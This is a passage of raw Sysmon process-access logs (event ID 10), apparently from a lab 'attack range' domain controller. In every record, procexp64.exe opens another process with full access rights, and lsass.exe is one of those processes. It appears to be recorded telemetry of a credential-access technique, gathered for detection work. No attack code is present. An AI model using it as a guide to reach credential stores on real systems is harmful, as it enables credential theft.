15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784746Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784745Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784744Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784743Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784742Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784741Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784740Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784739Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784738Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784737Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784736Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784735Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784734Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784733Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784732Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784731Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784730Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784729Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784728Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784727Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784726Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784725Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784724Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784723Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784722Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784721Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784720Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784719Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784718Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784841Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31B8-6010-AFA2-00000000A301}6088C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784840Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784839Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784838Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784837Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784836Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784835Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784834Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 